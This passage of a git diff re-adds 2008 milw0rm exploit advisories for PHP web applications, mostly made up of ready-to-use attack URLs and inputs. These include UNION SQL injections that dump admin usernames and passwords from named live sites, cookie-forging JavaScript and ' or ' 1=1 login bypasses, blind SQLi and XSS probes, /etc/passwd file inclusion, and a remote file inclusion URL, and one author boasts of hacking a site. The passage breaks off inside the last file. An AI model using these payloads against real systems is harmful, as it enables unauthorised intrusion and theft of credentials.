+http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- + +( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com ) + +example 2: ( you must look title ) + +http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-03] diff --git a/platforms/php/webapps/6964.txt b/platforms/php/webapps/6964.txt index 13c382334..658e9fc1e 100755 --- a/platforms/php/webapps/6964.txt +++ b/platforms/php/webapps/6964.txt 
@@ -1,28 +1,28 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ - -# [~] Discovered by : Hakxer -# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling -# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html -# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN -########################################################################## - -Bug In : /admin/Index.php - - PoC : javascript:document.cookie="username_cookie=admin"; - - [~] Admin panel - http://www.accscripts.com/realestate/demo/admin/index.php - [~] Execute JS Code javascript:document.cookie="username_cookie=admin"; - [~] Refresh - - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-03] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ + +# [~] Discovered by : Hakxer +# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling +# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html +# [~] Greetz : Allah .. " Allah AkBar .. 
" Big Hacking SoOoN +########################################################################## + +Bug In : /admin/Index.php + + PoC : javascript:document.cookie="username_cookie=admin"; + + [~] Admin panel + http://www.accscripts.com/realestate/demo/admin/index.php + [~] Execute JS Code javascript:document.cookie="username_cookie=admin"; + [~] Refresh + + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-03] diff --git a/platforms/php/webapps/6965.txt b/platforms/php/webapps/6965.txt index d59dc2734..d212b5758 100755 --- a/platforms/php/webapps/6965.txt +++ b/platforms/php/webapps/6965.txt 
@@ -1,28 +1,28 @@ -########################################################################### -______ __ __ ______ __ ______ -/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ -/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ -/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / -/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ -/____/ - -# [~] Discovered by : Hakxer -# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling -# [~] Script : http://www.accscripts.com/accstatistics.html -# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN -########################################################################## - -Bug In : /admin/Index.php - -PoC : javascript:document.cookie="username_cookie=admin"; - -[~] Admin panel -http://www.accstatistics.com/demo/index.php -[~] Execute JS Code javascript:document.cookie="username_cookie=admin"; -[~] Refresh - - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-03] +########################################################################### +______ __ __ ______ __ ______ +/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ +/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ +/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / +/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ +/____/ + +# [~] Discovered by : Hakxer +# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling +# [~] Script : http://www.accscripts.com/accstatistics.html +# [~] Greetz : Allah .. " Allah AkBar .. 
" Big Hacking SoOoN +########################################################################## + +Bug In : /admin/Index.php + +PoC : javascript:document.cookie="username_cookie=admin"; + +[~] Admin panel +http://www.accstatistics.com/demo/index.php +[~] Execute JS Code javascript:document.cookie="username_cookie=admin"; +[~] Refresh + + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-03] diff --git a/platforms/php/webapps/6966.txt b/platforms/php/webapps/6966.txt index 1f44c69e5..a84b1aef7 100755 --- a/platforms/php/webapps/6966.txt +++ b/platforms/php/webapps/6966.txt 
@@ -1,28 +1,28 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ - -# [~] Discovered by : Hakxer -# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling -# [~] Script : http://www.accscripts.com/mailinglist/ -# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN -########################################################################## - - - PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin"; - javascript:document.cookie="NEWSLETTERLOGIN=Hakxer"; - - [~] Admin panel - http://www.accscripts.com/mailinglist/demo/index.php - [~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin"; - [~] Refresh - - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-03] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ + +# [~] Discovered by : Hakxer +# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling +# [~] Script : http://www.accscripts.com/mailinglist/ +# [~] Greetz : Allah .. " Allah AkBar .. 
" Big Hacking SoOoN +########################################################################## + + + PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin"; + javascript:document.cookie="NEWSLETTERLOGIN=Hakxer"; + + [~] Admin panel + http://www.accscripts.com/mailinglist/demo/index.php + [~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin"; + [~] Refresh + + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-03] diff --git a/platforms/php/webapps/6967.txt b/platforms/php/webapps/6967.txt index ecbf070c1..1d312295c 100755 --- a/platforms/php/webapps/6967.txt +++ b/platforms/php/webapps/6967.txt 
@@ -1,39 +1,39 @@ -[~] MatPo Link Version 1.2 Beta Remote Sql inj. -[~] -[~] view.php (id) -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 03.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss yuzden nete ara verebilirim : ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -http://localhost/script_path/view.php?id=[SQL] - -[SQL]= - --999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7-- - -example: - -http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7-- - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-03] +[~] MatPo Link Version 1.2 Beta Remote Sql inj. 
+[~] +[~] view.php (id) +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 03.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: a.q kpss yuzden nete ara verebilirim : ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +http://localhost/script_path/view.php?id=[SQL] + +[SQL]= + +-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7-- + +example: + +http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7-- + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-03] diff --git a/platforms/php/webapps/6968.txt b/platforms/php/webapps/6968.txt index 40bd498c8..13132187f 100755 --- a/platforms/php/webapps/6968.txt +++ b/platforms/php/webapps/6968.txt 
@@ -1,19 +1,19 @@ --==========================================- -Autore: x0r - Road Crew - Evolution Team -Cms: Acc Autos v4.0 -Bug: Insecure Cookie Handling -Site: http://pro7.altervista.org/v2/ --==========================================- -Exploit: - -[+]javascript:document.cookie="username_cookie=admin"; -[+]javascript:document.cookie="right_cookie=1"; -[+]javascript:document.cookie="id_cookie=1"; - -Live Demo: - -http://www.accscripts.com/autos/demo/admin/ - -Greetz: 8\10\2008..Il Sogni Diventa Realtà...Bimb4 Ti AmO. - -# milw0rm.com [2008-11-03] +-==========================================- +Autore: x0r - Road Crew - Evolution Team +Cms: Acc Autos v4.0 +Bug: Insecure Cookie Handling +Site: http://pro7.altervista.org/v2/ +-==========================================- +Exploit: + +[+]javascript:document.cookie="username_cookie=admin"; +[+]javascript:document.cookie="right_cookie=1"; +[+]javascript:document.cookie="id_cookie=1"; + +Live Demo: + +http://www.accscripts.com/autos/demo/admin/ + +Greetz: 8\10\2008..Il Sogni Diventa Realtà...Bimb4 Ti AmO. + +# milw0rm.com [2008-11-03] diff --git a/platforms/php/webapps/6969.txt b/platforms/php/webapps/6969.txt index d741b88e9..90bc36128 100755 --- a/platforms/php/webapps/6969.txt +++ b/platforms/php/webapps/6969.txt 
@@ -1,76 +1,76 @@ -[~] Apoll version Remote Auth Bypass Vulnerability -[~] -[~] version: beta 0.7 -[~] -[~] script dwonload: http://www.miticdjd.com/download/3/ -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 03.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss yuzden nete ara verebilirim : ( -[~] -[~] ----------------------------------------------------------- - -admin login: - -http://localhost/apoll/admin/index.php - - -Exploit: - -username: [real_admin_or_user_name] ' or ' 1=1 - -password: dont write anything - -note: generally admin name: admin - - -example for my localhost: - -admin: zorlu - -user: salla - - - -username: zorlu ' or ' 1=1 - -password: empty - -or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) ) - -username: salla ' or ' 1=1 - -password: empty - - -file: - -apoll/admin/index.php - -code: - -$user = $_SESSION['user']; -$pass = $_SESSION['pass']; - -$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'"); - $num = @mysql_num_rows($mysql); - - - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-03] +[~] Apoll version Remote Auth Bypass Vulnerability +[~] +[~] version: beta 0.7 +[~] +[~] script dwonload: http://www.miticdjd.com/download/3/ +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 03.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: a.q kpss yuzden nete ara verebilirim : ( +[~] +[~] 
----------------------------------------------------------- + +admin login: + +http://localhost/apoll/admin/index.php + + +Exploit: + +username: [real_admin_or_user_name] ' or ' 1=1 + +password: dont write anything + +note: generally admin name: admin + + +example for my localhost: + +admin: zorlu + +user: salla + + + +username: zorlu ' or ' 1=1 + +password: empty + +or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) ) + +username: salla ' or ' 1=1 + +password: empty + + +file: + +apoll/admin/index.php + +code: + +$user = $_SESSION['user']; +$pass = $_SESSION['pass']; + +$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'"); + $num = @mysql_num_rows($mysql); + + + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-03] diff --git a/platforms/php/webapps/6971.txt b/platforms/php/webapps/6971.txt index 66d3ef27f..87d9ac7b3 100755 --- a/platforms/php/webapps/6971.txt +++ b/platforms/php/webapps/6971.txt 
@@ -1,33 +1,33 @@ -########################################################################### - ______ __ __ ______ __ ______ - / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ - / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ - / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / - /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ - /____/ EgY Coders Vulnerability Research TM - -# [~] Discovered by : Hakxer -# [~] Type Gap : Blind Sql inj / XSS -# [~] Script :MatPo Link 1.2b -# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk -########################################################################## - -|| Blind Sql Inj || - POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL] - Exploit : - http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False - http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True - - http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True - http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False - -|| Cross Site Scripting || -Poc: -http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS] -Exploit -http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema= - -# Proud To be a Muslim # -#_=END=_# - -# milw0rm.com [2008-11-03] +########################################################################### + ______ __ __ ______ __ ______ + / ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___ + / __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \ + / /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / / + /_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/ + /____/ EgY Coders Vulnerability Research TM + +# [~] Discovered by : Hakxer +# [~] Type Gap : Blind Sql inj / XSS +# [~] Script :MatPo Link 1.2b +# [~] Greetz : Allah , 
Egyptian x hacker , Br1ght D@rk +########################################################################## + +|| Blind Sql Inj || + POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL] + Exploit : + http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False + http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True + + http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True + http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False + +|| Cross Site Scripting || +Poc: +http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS] +Exploit +http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema= + +# Proud To be a Muslim # +#_=END=_# + +# milw0rm.com [2008-11-03] diff --git a/platforms/php/webapps/6972.txt b/platforms/php/webapps/6972.txt index 31429a318..d6975b549 100755 --- a/platforms/php/webapps/6972.txt +++ b/platforms/php/webapps/6972.txt 
@@ -1,36 +1,36 @@ -# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability -# url: http://sourceforge.net/projects/pppblog/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# In memory of rgod ;) - -*Requeriments: register_globals = On - -vulnerable code in randompic.php at lines 66-72: -... -header("Content-Type: image/gif"); -header("Content-Transfer-Encoding: binary"); -if (is_array($files)){ - if (is_file($files[$randnum])){ - readfile("$dir/$files[$randnum]"); - } -} -... - -poc[0] = randompic.php?files[0]=[file] -poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd - -linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod). - -tested on localhost with register_globals = On. - -Hack0wn :D - -# milw0rm.com [2008-11-03] +# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability +# url: http://sourceforge.net/projects/pppblog/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# In memory of rgod ;) + +*Requeriments: register_globals = On + +vulnerable code in randompic.php at lines 66-72: +... +header("Content-Type: image/gif"); +header("Content-Transfer-Encoding: binary"); +if (is_array($files)){ + if (is_file($files[$randnum])){ + readfile("$dir/$files[$randnum]"); + } +} +... + +poc[0] = randompic.php?files[0]=[file] +poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd + +linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod). + +tested on localhost with register_globals = On. + +Hack0wn :D + +# milw0rm.com [2008-11-03] 
diff --git a/platforms/php/webapps/6973.txt b/platforms/php/webapps/6973.txt index c70303d72..37a35a467 100755 --- a/platforms/php/webapps/6973.txt +++ b/platforms/php/webapps/6973.txt 
@@ -1,35 +1,35 @@ -[~]------------------------------------------------------------------------------------------------------------- -[~] TBmnetCMS v1.0 (index.php?content) Local File Inclusion Vulnerability -[~] -[~] http://www.tbmnet.de -[~] -[~] -[~] ------------------------------------------------------------------------------------------------------------ -[~] Bug founded by d3v1l [Avram Marius] -[~] -[~] Date: 3.11.2008 -[~] -[~] -[~] d3v1l@spoofer.com http://security-sh3ll.com -[~] -[~] ------------------------------------------------------------------------------------------------------------ -[~] Greetz tO ALL:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] milw0rm staff -[~]------------------------------------------------------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/index.php?content=../../../../../../../../../../../../../../etc/passwd%00 -[~] -[~] Ex :- - -[~] http://www.valtellinux.it/meeting/index.php?content=../../../../../../../../../../../../../../etc/passwd%00 -[~]---------------------------------------------------------------------------------------------------------------------- -[~] NEED:- magic_quotes=OFF -[~] -[~] NEED:- disable_functions=ini_set -[~]---------------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-04] +[~]------------------------------------------------------------------------------------------------------------- +[~] TBmnetCMS v1.0 (index.php?content) Local File Inclusion Vulnerability +[~] +[~] http://www.tbmnet.de +[~] +[~] +[~] ------------------------------------------------------------------------------------------------------------ +[~] Bug founded by d3v1l [Avram Marius] +[~] +[~] Date: 3.11.2008 +[~] +[~] +[~] d3v1l@spoofer.com http://security-sh3ll.com +[~] +[~] 
------------------------------------------------------------------------------------------------------------ +[~] Greetz tO ALL:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] milw0rm staff +[~]------------------------------------------------------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/index.php?content=../../../../../../../../../../../../../../etc/passwd%00 +[~] +[~] Ex :- + +[~] http://www.valtellinux.it/meeting/index.php?content=../../../../../../../../../../../../../../etc/passwd%00 +[~]---------------------------------------------------------------------------------------------------------------------- +[~] NEED:- magic_quotes=OFF +[~] +[~] NEED:- disable_functions=ini_set +[~]---------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6974.txt b/platforms/php/webapps/6974.txt index ec992bdd6..5ef3c6ce4 100755 --- a/platforms/php/webapps/6974.txt +++ b/platforms/php/webapps/6974.txt 
@@ -1,50 +1,50 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - IN THE NAME OF ALLAH --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -[~] Script: Multi Languages WebShop Online -[~] Language : PHP -[~] Website[0]: http://webbdomain.com/php/webshopir/ -[~] Website[1]: http://www.hotscripts.com/Detailed/84437.html -[~] Type : Commercial -[~] Report-Date : 04/11/2008 - - ---[ Founder ]-- -G4N0K - - ---[ Exploit ]-- -SQL => id -[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11-- - http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK - -XSS => name -[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13 -[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS] - - - ---[ L!ve ]-- -[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11-- - http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK -[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13 -[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E - - ---[ Greetz ]-- -[~] ALLAH -[~] Tornado2800 -[~] Hussain-X - -//Are ya looking for 
something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) -//ALLAH, forgimme... - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -exit(); //EoX --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -# milw0rm.com [2008-11-04] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + IN THE NAME OF ALLAH +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +[~] Script: Multi Languages WebShop Online +[~] Language : PHP +[~] Website[0]: http://webbdomain.com/php/webshopir/ +[~] Website[1]: http://www.hotscripts.com/Detailed/84437.html +[~] Type : Commercial +[~] Report-Date : 04/11/2008 + + +--[ Founder ]-- +G4N0K + + +--[ Exploit ]-- +SQL => id +[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11-- + http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK + +XSS => name +[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13 +[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS] + + + +--[ L!ve ]-- +[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11-- + http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK +[XSS] 
http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13 +[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E + + +--[ Greetz ]-- +[~] ALLAH +[~] Tornado2800 +[~] Hussain-X + +//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) +//ALLAH, forgimme... + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +exit(); //EoX +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +# milw0rm.com [2008-11-04] diff --git a/platforms/php/webapps/6975.txt b/platforms/php/webapps/6975.txt index b88592bc5..51baf9c47 100755 --- a/platforms/php/webapps/6975.txt +++ b/platforms/php/webapps/6975.txt 
@@ -1,43 +1,43 @@ -================================================================================================================================ - - -[o] VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerability - - Software : com_googlebase version 1.1 - Vendor : www.e-commerce-solution.co.uk - Download : http://www.joomlahacks.com/ [free download] - Author : NoGe - Contact : noge[dot]code[at]gmail[dot]com - Blog : http://evilc0de.blogspot.com - - -================================================================================================================================ - - - [o] Vulnerable file - - administrator/components/com_googlebase/admin.googlebase.php - - include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' ); - - - - [o] Exploit - - http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode] - - -================================================================================================================================ - - - [o] Greetz - - MainHack BrotherHood [ http://serverisdown.org/blog/] - Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa - H312Y yooogy mousekill }^-^{ kaka11 martfella - skulmatic olibekas ulga Cungkee k1tk4t str0ke - - -================================================================================================================================ - -# milw0rm.com [2008-11-04] +================================================================================================================================ + + +[o] VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerability + + Software : com_googlebase version 1.1 + Vendor : www.e-commerce-solution.co.uk + Download : http://www.joomlahacks.com/ [free download] + Author : NoGe + Contact : noge[dot]code[at]gmail[dot]com + Blog : http://evilc0de.blogspot.com + + 
